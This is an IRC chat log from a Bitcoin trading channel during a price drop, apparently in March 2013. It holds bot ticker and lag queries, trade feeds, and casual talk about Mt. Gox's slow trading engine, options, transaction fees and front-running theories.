23:47:31 All right, I got some free soup. I can sell at 89 per BTC Mar 28 23:47:32 4000 offered at 78.... Mar 28 23:47:57 ;;bids 75 Mar 28 23:47:58 There are currently 10389.23 bitcoins demanded at or over 75.0 USD, worth 787700.842721 USD in total. | Data vintage: 61.7392 seconds Mar 28 23:48:26 [MPEX] [O.BTCUSD.C750T] 1 @ 0.12938115 BTC [+] Mar 28 23:48:32 [BTCTC] [ASICMINER-PT] 3 @ 0.749 = 2.247 BTC [+] Mar 28 23:48:40 There's lots of bids... Mar 28 23:48:47 We'll hit a wall pretty soon... Mar 28 23:48:49 bits at what price Mar 28 23:48:52 how long do these freezes last Mar 28 23:49:12 ;;market --sell 10000 Mar 28 23:49:16 A market order to sell 10000 bitcoins right now would net 757756.5473 USD and would take the last price down to 75.0000 USD, resulting in an average price of 75.7757 USD/BTC. | Data vintage: 0.0006 seconds Mar 28 23:49:18 ;;ticker Mar 28 23:49:20 BTCUSD ticker | Best bid: 77.50000, Best ask: 78.00000, Bid-ask spread: 0.50000, Last trade: 77.50000, 24 hour volume: 86859.06297305, 24 hour low: 82.00000, 24 hour high: 95.70000, 24 hour vwap: 90.77563 Mar 28 23:49:27 KRS1: freezes? Mar 28 23:49:53 ya the quote on mtgox hasnt changed in 10-15 min i think Mar 28 23:50:03 last price Mar 28 23:50:10 oh, it depends on how many orders are put to gox Mar 28 23:50:18 coin trading at 92 on bitfloor... totally disconnected markets.... Mar 28 23:50:21 ;;goxlag Mar 28 23:50:22 461.095126 seconds Mar 28 23:50:37 so they freeze it to stabilize the price i assume Mar 28 23:50:46 KRS1: nope Mar 28 23:50:58 they just have a trading engine which can't keep up Mar 28 23:51:16 ;;ticker Mar 28 23:51:16 BTCUSD ticker | Best bid: 77.70000, Best ask: 77.98870, Bid-ask spread: 0.28870, Last trade: 77.70000, 24 hour volume: 86859.06297305, 24 hour low: 82.00000, 24 hour high: 95.70000, 24 hour vwap: 90.77563 Mar 28 23:51:41 the freeze probably exacerbate the sellout/jumps in Mar 28 23:51:44 oh i see..damn..not sure what to think about that then..would think the price would stabilize from wild swings or something with the timeout. good guess but wrong eh Mar 28 23:51:54 great.. Mar 28 23:51:56 because people can't see the price and panic buy/sell Mar 28 23:52:32 thats a good thing i guess Mar 28 23:52:56 [MPEX] [O.BTCUSD.P750T] 1000 @ 0.05255101 = 52.551 BTC [+] Mar 28 23:53:07 [BTCTC] [ASICMINER-PT] 22 @ 0.75 = 16.5 BTC [+] Mar 28 23:53:18 been using btc for two years now at least and didnt realize just how much i didnt know til i started looking more into this and talking to you fine folks Mar 28 23:53:21 its going deeper than I thought it would Mar 28 23:53:31 Buying puts now? Stupid idea Mar 28 23:53:53 options.. Mar 28 23:53:56 how fast can the 24h-all-market-vwap move? Mar 28 23:54:01 let them buy puts. mpbor prolly needs some healing Mar 28 23:54:08 eh, true Mar 28 23:54:27 But if they're going to waste money, better give it to me instead =/ Mar 28 23:54:41 is it really a waste ;) Mar 28 23:55:07 Average is high enough that one could wait much longer and buy those puts at the same price Mar 28 23:55:15 ;;tslb Mar 28 23:55:21 plus average moves too slowly, we'd have to see a further massive drop Mar 28 23:55:25 Namworld: Mar 28 23:55:29 u r wrong Mar 28 23:55:32 Time since last block: 1 minute and 44 seconds Mar 28 23:55:34 bot goes offline in 1 hour Mar 28 23:55:34 :( Mar 28 23:55:46 ;;bc,24hprc Mar 28 23:55:48 Error: I tried to send you an empty message. Mar 28 23:55:58 Lol, I sold at 89 Mar 28 23:56:01 4000 showed up for sale on bitfinex Mar 28 23:56:09 well, not offline, just stops selling/buying *T Mar 28 23:56:19 lucky you, Bowjob Mar 28 23:56:39 bowhob nice... Mar 28 23:57:08 I will sell at least 100 worth for 89 Mar 28 23:57:22 any way to get any mtgox data right now Mar 28 23:57:23 sold at 96,143 for 1/4 kg gold :) Mar 28 23:58:01 A quarter kilo of gold... neat Mar 28 23:58:06 http://imgur.com/DjLAsir << lol Mar 28 23:58:23 half way to my target price Mar 28 23:58:45 Namworld : the vwap can move very suddenly. Mar 28 23:59:00 if there's say 50k btc dumped right now at an avg of 60 the vwap would drop to like 70 on the next tick Mar 28 23:59:36 ;;ticker Mar 28 23:59:50 damientrog you should make/buy that old-fashion bag for gold coins now :-) Mar 28 23:59:52 BTCUSD ticker | Best bid: 76.25000, Best ask: 77.00000, Bid-ask spread: 0.75000, Last trade: 77.00000, 24 hour volume: 86859.06297305, 24 hour low: 82.00000, 24 hour high: 95.70000, 24 hour vwap: 90.77563 Mar 28 23:59:57 I feel bad for topace Mar 29 00:00:56 mpoe bot wins again... Mar 29 00:01:01 :D Mar 29 00:01:01 ;;ticker Mar 29 00:01:10 This selloff, man Mar 29 00:01:31 Error: Failure to retrieve ticker. Try again later. Mar 29 00:01:55 we were so close to 100... Mar 29 00:02:11 oh boo hoo Mar 29 00:02:13 keep crying Mar 29 00:02:50 http://bitbet.us/bet/316/bitcoin-to-trade-at-100-usd-by-the/ Mar 29 00:02:54 502 Bad Gateway Mar 29 00:02:55 easy money now Mar 29 00:02:56 I'll just buy more Mar 29 00:02:56 :> Mar 29 00:02:56 mircea: yeah, but it by the time vwap change, you'd have time to adjust position Mar 29 00:03:08 Assuming you're watching the price Mar 29 00:03:11 All right, I've won the BTC game Mar 29 00:03:17 [BTCTC] [B.YABMC] 1 @ 0.00876 BTC [-] Mar 29 00:03:23 Made my capital back and then some, still 100+ BTC. and then ASIC Mar 29 00:03:26 Im not worried. Mar 29 00:03:28 wew Mar 29 00:03:49 wish i wasnt so tired,m ight as well just go to back Mar 29 00:03:57 bed, and when i wake up its at 92 again Mar 29 00:03:58 [BTCTC] [B.YABMC] 1 @ 0.00875 BTC [-] Mar 29 00:04:01 and time to short the second time Mar 29 00:04:08 http://bitbet.us/bet/334/bitcoin-crashes-to-below-10-usd-before-sept/?ref=1EteoRKNYbNhhmFfsKnUSWRF3JUpKCcMnc Mar 29 00:04:25 taub, I have something to sleep soundly Mar 29 00:04:30 ^^ higher weight Mar 29 00:04:35 http://bitbet.us/bet/334/bitcoin-crashes-to-below-10-usd-before-sept/?ref=1EteoRKNYbNhhmFfsKnUSWRF3JUpKCcMnc Mar 29 00:04:43 everything to 60 is just a 30% retracement Mar 29 00:04:48 nothing that unusual Mar 29 00:04:52 be worried when it breaks 50 Mar 29 00:04:53 :/ Mar 29 00:05:00 Namworld depends. it can happen in one tick. Mar 29 00:05:10 yeah, I suppose Mar 29 00:05:18 it's not likely obviously Mar 29 00:05:22 but with btc... you never know. Mar 29 00:05:29 yes... 60 is support Mar 29 00:07:15 65 is support Mar 29 00:07:50 ;;goxlag Mar 29 00:07:57 Error: invalid syntax (, line 1) Mar 29 00:08:25 it's funny tho, crash happened just after i finally claimed my 50mn mkt cap trophy Mar 29 00:08:33 mircea_popescu are you technically able to start rally/panic sell? Mar 29 00:08:33 so i guess ty markets Mar 29 00:08:40 Cylta what's that mean ? Mar 29 00:08:50 ;;ticker Mar 29 00:08:56 mp - you jumped the shark Mar 29 00:09:01 Error: Failure to retrieve ticker. Try again later. Mar 29 00:09:06 yeh, old news nao. Mar 29 00:09:10 for example can you do crash like this at any time you want? Mar 29 00:09:20 i dunno Mar 29 00:09:27 gribble down? Mar 29 00:09:31 howwould i know ? Mar 29 00:09:33 pgp prolly mtgox. Mar 29 00:10:31 oops.... they might having a real problem right now... Mar 29 00:10:41 Cylta, mtgox won't be crashed "technically". instead some clever folks will feed it few indigestible orders Mar 29 00:10:51 if that isn't happening already Mar 29 00:11:01 whaddaya mean by "indigestible orders"? Mar 29 00:11:31 i remember mtgox engine discussed somewhere Mar 29 00:11:46 generally it's assumed it is very inefficient Mar 29 00:12:07 $vwap s.mpoe Mar 29 00:12:09 thestringpuller: S.MPOE 1 day: average: 0.00061457 high: 0.00066576 low: 0.0006 volume: 138646 btc: 85.20714111 7 day: average: 0.00066397 high: 0.00072379 low: 0.0006 volume: 1717494 btc: 1140.36576603 30 day: average: 0.00073513 high: 0.00078628 low: 0.0006 volume: 16803773 btc: 12352.973398 Mar 29 00:12:20 ;;ticker Mar 29 00:12:23 Error: Failure to retrieve ticker. Try again later. Mar 29 00:12:25 $bids s.mpoe Mar 29 00:13:08 mircea_popescu: what is command for depth Mar 29 00:13:10 oh depth Mar 29 00:13:14 $depth s.mpoe Mar 29 00:13:16 thestringpuller: S.MPOE Bids: ['27400 @ 0.00064468', '9650 @ 0.00063483', '5172 @ 0.00060001', '1000 @ 0.00060001', '97155 @ 0.0006'] Mar 29 00:13:17 thestringpuller: Asks: ['5000 @ 0.00067292', '5000 @ 0.00068292', '1300 @ 0.00068293', '5000 @ 0.00068294', '5000 @ 0.00069537'] Mar 29 00:13:18 gox down Mar 29 00:13:25 lmao Mar 29 00:13:42 srsly ? Mar 29 00:13:46 down hard, methinks... Mar 29 00:13:54 no it's up Mar 29 00:13:59 I can still trade Mar 29 00:14:18 I don't think it's quoting to charts Mar 29 00:14:25 ok its up now Mar 29 00:14:32 ;;ticker Mar 29 00:14:33 BTCUSD ticker | Best bid: 76.51340, Best ask: 78.00000, Bid-ask spread: 1.48660, Last trade: 76.51340, 24 hour volume: 111005.53495385, 24 hour low: 75.00111, 24 hour high: 95.70000, 24 hour vwap: 87.94464 Mar 29 00:14:35 ;;goxlag Mar 29 00:14:36 18.294714 seconds Mar 29 00:14:43 just need a reboot Mar 29 00:14:50 there it goes Mar 29 00:15:03 hey fam, when I send a tx with a confirmation fee, that confirmation fee does *not* come out of the amount sent to the recipient, right? Mar 29 00:15:20 right. Mar 29 00:15:21 benkay: that is correct Mar 29 00:15:26 some services do Mar 29 00:15:41 which ones, TaT? Mar 29 00:15:45 btc-e Mar 29 00:15:50 i think another Mar 29 00:15:54 do the dance Mar 29 00:15:59 its getting jiggly Mar 29 00:16:37 can't find it now. basically it was something about mtgox picking top order and doing select for matching orders in a loop Mar 29 00:16:54 so if there's many it seizes up Mar 29 00:17:27 lately, sometimes i see the top ask is a lower price than the next ask on clarkmoody sometimes Mar 29 00:17:34 sometimes sometimes Mar 29 00:19:48 I'm seeing a trend... Mar 29 00:20:21 Last time we were trying to break 75, flash crash to almost 50. Now we try to break 100, flash crash to almost 75. Now starting to go back up again... Mar 29 00:20:48 This... market... is... Mar 29 00:21:00 ... Mar 29 00:21:01 come on TANK Mar 29 00:21:11 it's like ltc prices Mar 29 00:21:14 It refuses to Mar 29 00:21:18 follow the wave Mar 29 00:21:20 lol we need to cool the market: http://engineering.stanford.edu/news/new-type-solar-structure-cools-buildings-full-sunlight Mar 29 00:22:05 neat Mar 29 00:22:11 namworld i noticed that too not sure wha tto make of it though Mar 29 00:22:56 ;;ticker Mar 29 00:23:00 BTCUSD ticker | Best bid: 78.50000, Best ask: 78.58238, Bid-ask spread: 0.08238, Last trade: 78.58238, 24 hour volume: 111005.53495385, 24 hour low: 75.00111, 24 hour high: 95.70000, 24 hour vwap: 87.94464 Mar 29 00:23:40 could it just be a lot of volume today..i noticed on gox for instance the volume has been high today looking back at a 1 week chart Mar 29 00:24:28 can't find it now. basically it was something about mtgox picking top order and doing select for matching orders in a loop << WHAT Mar 29 00:24:34 yesterday had some action.. Mar 29 00:24:48 uh that doesnt sound good lol Mar 29 00:25:09 sounds like we'd have some rewinding to do Mar 29 00:25:43 [MPEX] [S.MPOE] 5000 @ 0.00064468 = 3.2234 BTC [-] Mar 29 00:27:53 Guest14382> come on TANK Mar 29 00:27:56 you're late bro Mar 29 00:28:09 im going to bed, its just gonna crawl up to 92 Mar 29 00:28:17 thats reassuring Mar 29 00:28:17 again :> Mar 29 00:28:47 dont hold me to it Mar 29 00:29:21 nite Mar 29 00:29:25 [MPEX] [S.MPOE] 300 @ 0.00066676 = 0.2 BTC [+] Mar 29 00:32:55 ;;lag Mar 29 00:32:55 Error: "lag" is not a valid command. Mar 29 00:33:15 ok maybe the puts were a bad idea Mar 29 00:33:20 use ,,goxlag Mar 29 00:33:23 at least I only got 1000 Mar 29 00:33:27 Thx Mar 29 00:33:37 ;;ticker Mar 29 00:33:38 BTCUSD ticker | Best bid: 82.00000, Best ask: 84.62000, Bid-ask spread: 2.62000, Last trade: 84.62000, 24 hour volume: 111005.53495385, 24 hour low: 75.00111, 24 hour high: 95.70000, 24 hour vwap: 87.94464 Mar 29 00:33:43 ,,use goxlag Mar 29 00:33:50 of course the puts were a bad idea Mar 29 00:33:56 ,,goxlag Mar 29 00:34:07 ;;goxlag Mar 29 00:34:07 288.72481 seconds Mar 29 00:34:14 oh geez Mar 29 00:34:14 there could be a second wave Mar 29 00:34:21 10% chance Mar 29 00:34:22 indeed Mar 29 00:34:34 of a second wave Mar 29 00:34:34 maybe 40% chance Mar 29 00:34:40 10% chance of puts being profitable Mar 29 00:34:55 I hope someone is happy with his 50 BTC of worthless PUTs =/ Mar 29 00:35:01 I know it can hurt >.> Mar 29 00:35:07 ;;bc,24hprc Mar 29 00:35:14 Error: I tried to send you an empty message. Mar 29 00:35:44 where did you buy puts, people? Mar 29 00:36:00 MPEx Mar 29 00:36:05 time to buy Mar 29 00:36:20 time to sell Mar 29 00:36:39 time to laugh Mar 29 00:37:01 time to cry Mar 29 00:37:17 time to laugh Mar 29 00:38:14 tough month for the bot? Mar 29 00:38:36 the mpoe bot, that is Mar 29 00:38:44 time to kill Mar 29 00:38:57 what if mp can play agaist his options, to correct price of market to not to pay too much?.. Mar 29 00:38:59 time to go to bed, seems to be recovering Mar 29 00:39:25 No more buyers, Nam wants cheaper coins! Mar 29 00:39:33 ;;goxlag Mar 29 00:39:33 163.980752 seconds Mar 29 00:39:47 Seriously... MtGox... Mar 29 00:39:52 Go hide your shame... Mar 29 00:40:11 Your incompetence is naked Mar 29 00:40:16 ;;ticker Mar 29 00:40:16 BTCUSD ticker | Best bid: 86.00000, Best ask: 88.72000, Bid-ask spread: 2.72000, Last trade: 88.72000, 24 hour volume: 111005.53495385, 24 hour low: 75.00111, 24 hour high: 95.70000, 24 hour vwap: 87.94464 Mar 29 00:40:22 I can see too much of it. Mar 29 00:40:41 ;;goxlag Mar 29 00:40:41 167.450794 seconds Mar 29 00:40:57 lol... check the last blocks Mar 29 00:41:00 125add80f475024677b82ce00d26415c7195cb2be27e6522b161a3e64fac8081 Mar 29 00:41:06 How come I cant see this on the tx chain Mar 29 00:41:11 people rushing 10ks of BTC, probably to exchanges Mar 29 00:41:52 Bowjob: I'm having the same problem. I sent a transaction but I don't see it on blockchain.info Mar 29 00:42:07 I feel slighlty liberated Mar 29 00:42:09 I won. Mar 29 00:42:10 lol Mar 29 00:42:12 yeah Mar 29 00:42:16 but wtf is this shit Mar 29 00:42:34 [BTCTC] [ASICMINER-PT] 53 @ 0.75 = 39.75 BTC [+] Mar 29 00:43:41 ;;ticker Mar 29 00:43:42 BTCUSD ticker | Best bid: 87.00000, Best ask: 89.50000, Bid-ask spread: 2.50000, Last trade: 89.50000, 24 hour volume: 111005.53495385, 24 hour low: 75.00111, 24 hour high: 95.70000, 24 hour vwap: 87.94464 Mar 29 00:43:50 [BTCTC] [ASICMINER-PT] 50 @ 0.75 = 37.5 BTC [+] Mar 29 00:44:02 ;;goxlag Mar 29 00:44:02 305.796827 seconds Mar 29 00:44:06 oh god Mar 29 00:44:10 ;;ticker Mar 29 00:44:10 BTCUSD ticker | Best bid: 87.50000, Best ask: 89.50000, Bid-ask spread: 2.00000, Last trade: 89.50000, 24 hour volume: 111005.53495385, 24 hour low: 75.00111, 24 hour high: 95.70000, 24 hour vwap: 87.94464 Mar 29 00:44:14 [BTCTC] [ASICMINER-PT] 6 @ 0.75 = 4.5 BTC [+] Mar 29 00:44:18 89.5 best ask Mar 29 00:44:25 We're back up in a flash Mar 29 00:45:07 ;;bc,24hprc Mar 29 00:45:08 Error: I tried to send you an empty message. Mar 29 00:45:09 urgh Mar 29 00:45:12 ;;ticker Mar 29 00:45:13 BTCUSD ticker | Best bid: 88.00000, Best ask: 89.50000, Bid-ask spread: 1.50000, Last trade: 87.50000, 24 hour volume: 111005.53495385, 24 hour low: 75.00111, 24 hour high: 95.70000, 24 hour vwap: 87.94464 Mar 29 00:45:17 not bad Mar 29 00:46:13 ;;ticker Mar 29 00:46:14 BTCUSD ticker | Best bid: 87.00000, Best ask: 89.50000, Bid-ask spread: 2.50000, Last trade: 87.00000, 24 hour volume: 111005.53495385, 24 hour low: 75.00111, 24 hour high: 95.70000, 24 hour vwap: 87.94464 Mar 29 00:47:08 ;;goxlag Mar 29 00:47:09 408.410853 seconds Mar 29 00:47:14 [BTCTC] [ASICMINER-PT] 61 @ 0.75 = 45.75 BTC [+] Mar 29 00:47:19 [BTCTC] [ASICMINER-PT] 1 @ 0.75 BTC [+] Mar 29 00:47:22 [BTCTC] [ASICMINER-PT] 1 @ 0.799 BTC [+] Mar 29 00:47:28 [BTCTC] [ASICMINER-PT] 15 @ 0.7995 = 11.9925 BTC [+] Mar 29 00:47:30 [BTCTC] [ASICMINER-PT] 2 @ 0.7997 = 1.5994 BTC [+] Mar 29 00:47:33 [BTCTC] [ASICMINER-PT] 1 @ 0.7998 BTC [+] Mar 29 00:47:36 [BTCTC] [ASICMINER-PT] 3 @ 0.7999 = 2.3997 BTC [+] Mar 29 00:47:39 [BTCTC] [ASICMINER-PT] 23 @ 0.8 = 18.4 BTC [+] Mar 29 00:47:41 [BTCTC] [ASICMINER-PT] 1 @ 0.8 BTC [+] Mar 29 00:47:44 [BTCTC] [ASICMINER-PT] 1 @ 0.8 BTC [+] Mar 29 00:48:20 good grief Mar 29 00:48:34 gonna be good month Mar 29 00:48:43 happy april to all the lucky winners Mar 29 00:49:09 winners of? Mar 29 00:49:50 ;;ticker Mar 29 00:49:50 BTCUSD ticker | Best bid: 87.51100, Best ask: 89.00000, Bid-ask spread: 1.48900, Last trade: 89.00000, 24 hour volume: 111005.53495385, 24 hour low: 75.00111, 24 hour high: 95.70000, 24 hour vwap: 87.94464 Mar 29 00:50:26 ;;bc,24hprc Mar 29 00:50:33 Error: I tried to send you an empty message. Mar 29 00:50:42 its down Mar 29 00:50:52 [BTCTC] [ASICMINER-PT] 1 @ 0.8185 BTC [+] Mar 29 00:50:54 [BTCTC] [ASICMINER-PT] 3 @ 0.81885 = 2.4566 BTC [+] Mar 29 00:50:59 [BTCTC] [ASICMINER-PT] 3 @ 0.818899 = 2.4567 BTC [+] Mar 29 00:51:09 [BTCTC] [ASICMINER-PT] 10 @ 0.81999 = 8.1999 BTC [+] Mar 29 00:51:12 [BTCTC] [ASICMINER-PT] 10 @ 0.82897 = 8.2897 BTC [+] Mar 29 00:51:15 [BTCTC] [ASICMINER-PT] 1 @ 0.8393 BTC [+] Mar 29 00:51:18 [BTCTC] [ASICMINER-PT] 3 @ 0.83945 = 2.5184 BTC [+] Mar 29 00:51:20 [BTCTC] [ASICMINER-PT] 2 @ 0.84 = 1.68 BTC [+] Mar 29 00:51:23 [BTCTC] [ASICMINER-PT] 158 @ 0.84 = 132.72 BTC [+] Mar 29 00:51:42 well that AM bargain price was short-lived Mar 29 00:51:56 [BTCTC] [ASICMINER-PT] 1 @ 0.84 BTC [+] Mar 29 00:52:29 lowest ask is .87 on BF Mar 29 00:52:45 .84 on BCTC Mar 29 00:53:43 $vwap ^ Mar 29 00:53:45 smickles: ^OIX 1 day: no data 7 day: average: 86.3571781 high: 86.36645422 low: 66.22384528 volume: 100848 btc: 19472.9877722 30 day: no data Mar 29 00:54:13 ;;ticker Mar 29 00:54:14 BTCUSD ticker | Best bid: 87.50000, Best ask: 88.00000, Bid-ask spread: 0.50000, Last trade: 88.00000, 24 hour volume: 111005.53495385, 24 hour low: 75.00111, 24 hour high: 95.70000, 24 hour vwap: 87.94464 Mar 29 00:55:23 bitcointalk forum new record set Mar 29 00:55:32 bitcointalk reddit new record set Mar 29 00:55:57 for most retards in one place? Mar 29 00:57:18 Lyspooner what records are those ? Mar 29 00:57:31 apparently it's the most retards in one place Mar 29 00:57:35 lol Mar 29 00:58:05 most online at one time Mar 29 00:58:18 the forum record hadn't been broken since 2011 Mar 29 00:58:26 [BTCTC] [ASICMINER-PT] 32 @ 0.84 = 26.88 BTC [+] Mar 29 00:58:29 [BTCTC] [ASICMINER-PT] 10 @ 0.85 = 8.5 BTC [+] Mar 29 00:58:29 the reddit one is being broken every day Mar 29 00:58:37 this is bitcoin's endless september moment. Mar 29 00:58:40 we will rue the day. Mar 29 00:59:05 it feels like more stupid people are hearing about bitcoin all the time Mar 29 00:59:37 Compassion is in order Mar 29 00:59:46 of course Mar 29 01:00:02 but right now i see lots of "how does it work?" "it goes up" Mar 29 01:00:08 [MPEX] [O.BTCUSD.C750T] 1000 @ 0.15872391 = 158.7239 BTC [+] Mar 29 01:00:10 "now i understand it" Mar 29 01:00:18 mircea_popescu: 'endless march' has a nice ring to it Mar 29 01:00:19 perfect. Mar 29 01:00:26 quick, to the bitbillions! Mar 29 01:01:08 [HAVELOCK] [HIM] 2 @ 1.88 = 3.76 BTC [+] Mar 29 01:01:20 mircea_popescu: ask mtgox nicely to give the secret price adjustment knob a quarter-turn up, and the idiots will go away again. Mar 29 01:02:04 heh. Mar 29 01:02:42 Ah, I could finally pay out BTC-BOND and still have lots of BTC to trade. Mar 29 01:02:51 i'm jealous of all the people who can trust a new currency they never heard about without trying to understand a) how it kind of works and b) why it might be favorable to other currencies Mar 29 01:03:04 I'm needing BTC-BOND to have a large trading capital less and less. Mar 29 01:03:36 endless chocolate: http://i.imgur.com/qjjlkGm.gif Mar 29 01:03:56 Lyspooner: are you also jealous of the people who happily send their life savings to Nigerian spammers? ignorance is bliss, and all that? Mar 29 01:04:18 well if they do it happily, that's great Mar 29 01:04:42 Lyspooner: "first ecstasy, then laundry." Mar 29 01:04:46 It's fake! Mar 29 01:05:14 Namworld stop spoiling things! Mar 29 01:06:13 Lyspooner> bitcointalk forum new record set Mar 29 01:06:18 lol at the expanding chocolate Mar 29 01:06:23 plot new users, topics and posts against price Mar 29 01:06:27 interesting results Mar 29 01:06:31 ;) Mar 29 01:07:04 ;;goxlag Mar 29 01:07:05 0.21807 seconds Mar 29 01:07:09 it also peaked at $30 Mar 29 01:07:11 taub, the last time bitcointalk set a new record, the bubble burst Mar 29 01:07:16 yep Mar 29 01:07:27 ;;ticker Mar 29 01:07:28 BTCUSD ticker | Best bid: 86.10002, Best ask: 86.48900, Bid-ask spread: 0.38898, Last trade: 86.10002, 24 hour volume: 127589.30954445, 24 hour low: 75.00111, 24 hour high: 95.70000, 24 hour vwap: 87.39577 Mar 29 01:07:50 who wants to be the first to set up a trading bot that counts irc/www BTC chumps and adjusts trading strategy accordingly? Mar 29 01:08:40 counting memegenerator links is simpler Mar 29 01:11:33 I can't find my tx on the block Mar 29 01:11:34 WTF Mar 29 01:12:41 Me neither Mar 29 01:12:57 It might just not have been relayed Mar 29 01:13:07 I got one that's there and another that's not showing up Mar 29 01:14:03 nam. what happens to it then Mar 29 01:14:05 is it gone? Mar 29 01:14:35 easy & fun explanation: mtgox is front-running trades. Mar 29 01:14:47 idk Mar 29 01:14:58 either it's not relayed yet Mar 29 01:15:08 or otherwise I don't know why Mar 29 01:15:12 They do What They Must, Because They Can (tm) Mar 29 01:15:15 i sold some to topace Mar 29 01:16:00 ;;goxlag Mar 29 01:16:01 68.10059 seconds Mar 29 01:16:05 ;;ticker Mar 29 01:16:06 BTCUSD ticker | Best bid: 85.79006, Best ask: 85.79668, Bid-ask spread: 0.00662, Last trade: 85.79668, 24 hour volume: 127719.97605760, 24 hour low: 75.00111, 24 hour high: 95.70000, 24 hour vwap: 87.39194 Mar 29 01:16:28 bigger and better evil theory: a network of colluding BTC nodes is front-running trades. Mar 29 01:17:16 asciilifeform dude. bitcoin people don't have the intellectual wherewithal to wipe their own nose. Mar 29 01:17:24 [MPEX] [S.MPOE] 22400 @ 0.00064468 = 14.4408 BTC [-] Mar 29 01:17:27 the devteam doesn't know which side is up sufficiently to test its own code. Mar 29 01:17:37 the mtgox people are apparently running a select loop Mar 29 01:18:00 miners have yet to figure out wtf hedging is and how it works, in spite of it being explaiend on trilema, diff futures being available etc. Mar 29 01:18:05 but if cnat raed cnat raed. Mar 29 01:18:05 mircea_popescu: most Americans can't tie their shoes. Doesn't stop the remaining ones from, well, buggering the planet raw. Mar 29 01:18:08 [BTCTC] [ASICMINER-PT] 20 @ 0.839995 = 16.7999 BTC [-] Mar 29 01:18:15 and you want me to believe anyone actually thinks ? get out for srsly. Mar 29 01:18:18 we're not that lucky. Mar 29 01:18:52 mircea_popescu: if you carry on with the assumption that you are the only thinking man in BTC, you will come to no good. Mar 29 01:19:25 i wasn't counting myself either. Mar 29 01:19:45 great. electum is down Mar 29 01:19:50 if somebody is smart enough to implement evil colluding front trading, Mar 29 01:20:01 they'd be making about 10x that by... i dunno... making an asic run. Mar 29 01:20:18 one that's not run by retards who apparently can't get 20kw installed in one place or whatever the fuck. Mar 29 01:20:38 seriously, there's so much free space for white hatness that you'd have to be quite insane to bother with darkhatness. Mar 29 01:20:43 mircea_popescu: ASICs are boring because they're a straight competition of fiat bank accounts (with the possible exception of the sneak-an-SHA256-engine-on-a-commercial-die idea) Mar 29 01:20:55 right. Mar 29 01:21:12 we have to come to a discussion of boring, because on the straight motivation factor this makes no sense. Mar 29 01:21:20 [BTCTC] [ASICMINER-PT] 1 @ 0.8778 BTC [+] Mar 29 01:21:21 greed'd be better served by more useful applications atm. Mar 29 01:21:25 [BTCTC] [ASICMINER-PT] 8 @ 0.8779 = 7.0232 BTC [+] Mar 29 01:21:34 those low calls have a breakeven point of like 2000 USD/BTC+ Mar 29 01:21:36 mircea_popescu: blackhatness is fun, because you can not just make money, but phuck people Mar 29 01:21:58 mircea_popescu: esp. fun when you phuck the people who think they're unphuckable Mar 29 01:22:07 who cares ? Mar 29 01:22:37 mircea_popescu: right now, nobody. after the fact, everybody. Mar 29 01:22:43 i dunno. Mar 29 01:23:01 so some idiot thinks he's the bee's knees and you show him better. Mar 29 01:23:02 so ? Mar 29 01:23:20 this is like people stumbling and landing on their face in public imagining "everyone saw". nope. nobody gave a shit. Mar 29 01:23:35 all in all, watching another feeble and desperate attempt by humanity to reinvent itself. Mar 29 01:23:36 mircea_popescu: it is far more interesting when a clever fellow thinks he is all that, and you show him better. Mar 29 01:23:42 why ? Mar 29 01:23:54 i still don't see who'd care or why'd it matter. at all, like. Mar 29 01:24:21 mircea_popescu: BTC is your playground, too. presumably you like to win rather than lose. Mar 29 01:24:42 i honestly don't care. Mar 29 01:25:00 Do we have technically minded people here? Mar 29 01:25:02 probably difficult to digest, but i don't. i'm strictly interested in thinking things through and implementing them correctly. Mar 29 01:25:37 mircea_popescu: one day you'll cash out your 1 MegaBTC to buy Marscoins, to fly your harem to Mars and retire there... Mar 29 01:25:43 asciilifeform why ? Mar 29 01:25:59 ;;ticker Mar 29 01:25:59 BTCUSD ticker | Best bid: 88.20002, Best ask: 88.34000, Bid-ask spread: 0.13998, Last trade: 88.20002, 24 hour volume: 131782.34304095, 24 hour low: 75.00111, 24 hour high: 95.70000, 24 hour vwap: 87.35351 Mar 29 01:26:20 mircea_popescu: when you push "return", 1 BTC is worth 1 Marscoin. But before the transaction goes through, 1 Marscoin will be worth 1000 BTC. Because front-runners... Mar 29 01:26:36 why am i retiring. Mar 29 01:26:57 ok strike that. but imagine you were to actually spend a large parcel of your coin on something - anything. Mar 29 01:27:02 kay Mar 29 01:27:41 Bowjob, kinda. Mar 29 01:27:45 a clever fellow could observe the parcel changing hands before the price on the exchange moves Mar 29 01:27:45 ;;bc,24hprc Mar 29 01:27:47 87.53 Mar 29 01:27:47 and so forth Mar 29 01:28:33 90 Mar 29 01:28:46 (replace "exchange" with the ultimate destination of MP's 1 MegaBTC.) Mar 29 01:28:51 why do i use an exchange ? Mar 29 01:28:53 maybe i just otc. Mar 29 01:29:04 asciilifeform: how? whales move in and out of 1Fx.... all the time Mar 29 01:29:18 Namworld Mar 29 01:29:24 I got the TX working Mar 29 01:29:41 kinda cool that mpex's addy starts with 1Fx Mar 29 01:29:49 otc seems a better deal Mar 29 01:29:50 jurov: the whales move unmolested now, because nobody (AFAIK) is operating a massive "BTC telescope" for the purpose of front-running. Mar 29 01:30:34 if every time you carry out a transaction God transmitted it to every BTC user simultaneously, this scenario would not apply. But this isn't how the network works. Mar 29 01:30:39 my transaction just ain't confirming... Mar 29 01:31:12 Namworld start adding a fee would you. Mar 29 01:32:02 is there an api for # of unconfirmed txs anywhere? Mar 29 01:32:32 I had a fee... Mar 29 01:32:33 ironically, im certain the bitcoind on my machine knows that.. but getting the number out of it... Mar 29 01:32:40 Feeless transactions confirm faste >.> Mar 29 01:32:43 faster* Mar 29 01:32:45 lol srsly ?! Mar 29 01:32:56 jurov iirc blockchain had it Mar 29 01:33:02 0.0001 on a large move (120 BTC) Mar 29 01:33:37 0.0001 is too small as i found out myself yest Mar 29 01:34:07 eh Mar 29 01:34:14 Will get confirmed eventually Mar 29 01:34:31 anyone here using electrum Mar 29 01:34:33 yea, in mere 12 hours or so Mar 29 01:34:51 i'm using 0.001 Mar 29 01:35:55 so like 9 cents Mar 29 01:36:10 Well that's a lot cheaper than PayPal Mar 29 01:37:16 The necessary fee on your tx is well predictable, if anyone minded to analyze the unconfirmed txs statistically Mar 29 01:38:12 um... i hear someone asking about bachelor thesis? Mar 29 01:38:52 who cares srsly ? Mar 29 01:39:07 the day i save on a dime is the day i pack up the harem and retire on mars. Mar 29 01:39:11 I wonder what's up with ZIGGAP Mar 29 01:39:37 jurov: Mar 29 01:39:40 $unconfirmed Mar 29 01:39:44 smickles: 1255 Mar 29 01:40:11 O.o Mar 29 01:40:29 srs Mar 29 01:41:03 $mail Mar 29 01:41:14 er,, Mar 29 01:41:16 $email Mar 29 01:41:18 smickles: No new messages received. Mar 29 01:41:20 not 